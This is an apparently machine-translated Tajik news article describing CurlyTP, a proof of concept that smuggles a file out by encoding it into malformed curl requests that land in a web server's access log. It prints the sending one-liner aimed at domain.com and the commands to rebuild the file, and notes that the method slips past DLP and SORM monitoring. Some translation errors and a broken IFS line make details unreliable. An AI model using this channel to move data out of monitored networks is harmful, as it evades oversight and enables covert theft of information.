Тибқи таърифи Википедиа, қатраи мурда як воситаи тавтиъаест, ки барои табодули иттилоот ё баъзе ашё байни одамоне, ки аз макони махфӣ истифода мебаранд, хидмат мекунад. Идеяи он аст, ки одамон ҳеҷ гоҳ вомехӯранд - аммо онҳо ба ҳар ҳол барои нигоҳ доштани бехатарии амалиёт маълумот мубодила мекунанд.

Ҷои пинҳон набояд диққати худро ҷалб кунад. Аз ин рӯ, дар ҷаҳони офлайн онҳо аксар вақт чизҳои оқилонаро истифода мебаранд: хишти фуҷур дар девор, китоби китобхона ё холӣ дар дарахт.

Дар Интернет воситаҳои зиёди рамзгузорӣ ва беномсозӣ мавҷуданд, аммо худи далели истифодаи ин асбобҳо таваҷҷӯҳро ба худ ҷалб мекунад. Илова бар ин, онҳо метавонанд дар сатҳи корпоративӣ ё ҳукумат баста шаванд. Чӣ бояд кард?

Таҳиягар Райан Флоурс як варианти ҷолибро пешниҳод кард - ҳама гуна сервери вебро ҳамчун ҷои пинҳон истифода баред. Агар шумо дар ин бора фикр кунед, сервери веб чӣ кор мекунад? Дархостҳоро қабул мекунад, файлҳо медиҳад ва гузоришҳоро менависад. Ва он ҳама дархостҳоро сабт мекунад, ҳатто нодуруст!

Маълум мешавад, ки ҳама гуна веб-сервер ба шумо имкон медиҳад, ки қариб ҳама паёмҳоро дар гузориш захира кунед. Гулҳо ҳайрон шуданд, ки инро чӣ тавр истифода баранд.

Ӯ ин вариантро пешниҳод мекунад:

1. Файли матниро гиред (паёми махфӣ) ва ҳашро ҳисоб кунед (md5sum).
2. Мо онро рамзгузорӣ мекунем (gzip+uuencode).
3. Мо ба гузориш бо истифода аз дархости дидаву дониста нодуруст ба сервер менависем.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Барои хондани файл, шумо бояд ин амалҳоро бо тартиби баръакс иҷро кунед: файлро декод ва кушоед, хэшро тафтиш кунед (хэшро метавон тавассути каналҳои кушода бехатар интиқол дод).

Ҷойҳо бо иваз карда мешаванд =+=то ки дар адрес холй набошад. Барнома, ки муаллиф онро CurlyTP номидааст, рамзгузории base64-ро, ба монанди замимаҳои почтаи электронӣ истифода мебарад. Дархост бо калимаи калидӣ дода мешавад ?transfer?то ки гиранда онро дар журналхо ба осонӣ пайдо кунад.

Дар ин ҳолат мо дар гузоришҳо чӣ мебинем?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Тавре ки аллакай зикр гардид, барои гирифтани паёми махфӣ шумо бояд амалҳоро бо тартиби баръакс иҷро кунед:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Равандро автоматӣ кардан осон аст. Md5sum мувофиқат мекунад ва мундариҷаи файл тасдиқ мекунад, ки ҳама чиз дуруст рамзкушо шудааст.

Усули хеле содда аст. "Мақсади ин машқ танҳо исбот кардани он аст, ки файлҳоро тавассути дархостҳои хурди бегуноҳи веб интиқол додан мумкин аст ва он дар ҳама серверҳои веб бо сабтҳои матнии оддӣ кор мекунад. Аслан, ҳар як веб-сервер ҷои пинҳон аст! ” менависад Гулҳо.

Албатта, ин усул танҳо он вақт кор мекунад, ки қабулкунанда ба гузоришҳои сервер дастрасӣ дошта бошад. Аммо чунин дастрасӣ, масалан, аз ҷониби бисёре аз hosters таъмин карда мешавад.

Чӣ тавр истифода бурдани он?

Райан Флоуэрз мегӯяд, ки ӯ коршиноси амнияти иттилоотӣ нест ва рӯйхати истифодаи эҳтимолиро барои CurlyTP тартиб намедиҳад. Барои ӯ, ин танҳо як далели консепсия аст, ки асбобҳои шиносе, ки мо ҳар рӯз мебинем, метавонанд ба таври ғайримуқаррарӣ истифода шаванд.

Дар асл, ин усул нисбат ба дигар серверҳои "пинҳон кардан" як қатор бартариҳо дорад Тарки рақамии мурда ё PirateBox: он конфигуратсияи махсус дар тарафи сервер ё ягон протоколҳои махсусро талаб намекунад - ва дар байни онҳое, ки трафикро назорат мекунанд, шубҳаро ба вуҷуд намеоранд. Гумон аст, ки системаи SORM ё DLP URL-ро барои файлҳои матнии фишурда скан кунад.

Ин яке аз роҳҳои интиқоли паёмҳо тавассути файлҳои хидматӣ мебошад. Шумо метавонед дар хотир доред, ки чӣ гуна баъзе ширкатҳои пешрафта ҷойгир мекарданд Ҷойҳои таҳиякунанда дар сарлавҳаҳои HTTP ё дар коди саҳифаҳои HTML.

Идея ин буд, ки танҳо таҳиягарони веб ин тухми Пасхаро мебинанд, зеро одами оддӣ ба сарлавҳаҳо ё коди HTML нигоҳ намекунад.

Манбаъ: will.com